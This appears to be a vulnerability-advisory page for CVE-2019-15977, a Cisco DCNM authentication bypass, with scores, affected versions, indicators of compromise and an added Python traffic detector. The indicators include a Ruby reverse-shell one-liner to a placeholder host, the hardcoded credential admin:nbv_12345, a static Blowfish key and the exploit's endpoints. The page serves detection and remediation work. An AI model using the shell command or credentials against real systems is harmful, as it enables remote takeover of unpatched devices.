CVE-2019-15977
published 2020-01-06


Priority: P276 · high · 7.5 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 38.11% (98.4th percentile)
Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.

Affected

3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | cisco_data_center_network_manager | >= unspecified < n/a | n/a |
| cisco | data_center_network_manager | < 11.3(1) | 11.3(1) |
| cisco | data_center_network_manager | | |

Detection & IOCs (extracted from sources)

url: https://<target>/serverinfo/HtmlAdaptor?action=displayServerInfos
url: https://<target>/j_spring_security_check
url: https://<target>/rest/fabrics
cookie: JSESSIONID
cookie: resttoken
other: jaas is the way
other: admin:nbv_12345
command: {ruby,-rsocket,-e'c=TCPSocket.new("<ls>","<lp>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print(io.read)}end'}
snort: SID 52530 - 52547
  • Monitor for unauthenticated HTTP GET requests to /serverinfo/HtmlAdaptor?action=displayServerInfos using HTTP Basic Auth with hardcoded credentials (admin:nbv_12345); this endpoint leaks DB credentials, VFS paths, and SFTP credentials used to bypass authentication.
  • The exploit decrypts leaked passwords using Blowfish ECB with the static key 'jaas is the way'; presence of this key in memory or network traffic is a strong indicator of exploitation activity against DCNM.
  • Alert on Set-Cookie headers from DCNM containing both JSESSIONID (56-char) and resttoken patterns in the same response, indicating successful authentication bypass and session establishment.
  • CVE-2019-15977 is classified under CWE-798 (Use of Hard-coded Credentials); hunt for use of the static credential pair admin/nbv_12345 against DCNM management interfaces.
  • The exploit was tested specifically against Cisco DCNM 11.2.1 ISO Virtual Appliance (VMware, KVM, Bare-metal); the hardcoded credential and Blowfish key behavior may differ across other DCNM versions.
  • There are no workarounds available for these vulnerabilities; only applying Cisco's released software updates fully remediates CVE-2019-15977.
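
Added example (not part of the original page or of any vendor tooling): a small detector for the request and response indicators in the bullets above. It assumes HTTP heads are available in clear text, for example from a TLS-terminating proxy; the function names and the sample traffic are constructed for illustration.

```python
import base64
from urllib.parse import urlsplit, parse_qs
# Indicator values are the ones listed on this page.
SERVERINFO_PATH = "/serverinfo/HtmlAdaptor"
SERVERINFO_ACTION = "displayServerInfos"
STATIC_CREDENTIAL = "admin:nbv_12345"

def parse_head(raw):
    """Return (start_line, {lower-cased header name: [values]}) for a raw HTTP head."""
    lines = raw.strip().splitlines() or [""]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers

def basic_credential(headers):
    """Decode an HTTP Basic credential; None when absent or malformed."""
    scheme, _, token = (headers.get("authorization") or [""])[0].partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        return base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return None

def check_request(raw):
    """Flag the serverinfo request and any use of the static credential pair."""
    start, headers = parse_head(raw)
    url = urlsplit((start.split() + ["", ""])[1])  # request target, "" if malformed
    hits = []
    if url.path == SERVERINFO_PATH and SERVERINFO_ACTION in parse_qs(url.query).get("action", []):
        hits.append("serverinfo-request")
    if basic_credential(headers) == STATIC_CREDENTIAL:
        hits.append("static-credential")
    return hits

def check_response(raw):
    """Flag a response that sets both JSESSIONID and resttoken cookies."""
    _, headers = parse_head(raw)
    names = {c.split("=", 1)[0].strip() for c in headers.get("set-cookie", [])}
    return ["session-and-resttoken"] if {"JSESSIONID", "resttoken"} <= names else []

# Constructed sample traffic (not captured from a real device).
SAMPLE_REQUEST = ("GET /serverinfo/HtmlAdaptor?action=displayServerInfos HTTP/1.1\n"
                  "Host: dcnm.example.test\nAuthorization: Basic " + base64.b64encode(STATIC_CREDENTIAL.encode()).decode())
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\nSet-Cookie: JSESSIONID=" + "A" * 56
                   + "; Path=/\nSet-Cookie: resttoken=constructed-value")
```

The credential check runs on every request rather than only on the serverinfo path, so reuse of the static pair against other DCNM management endpoints is also reported.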

CVSS provenance

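| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.8 | HIGH | AV:N/AC:L/Au:N/C:C/I:N/A:N |
| vendor_cisco | | 9.8 | CRITICAL | |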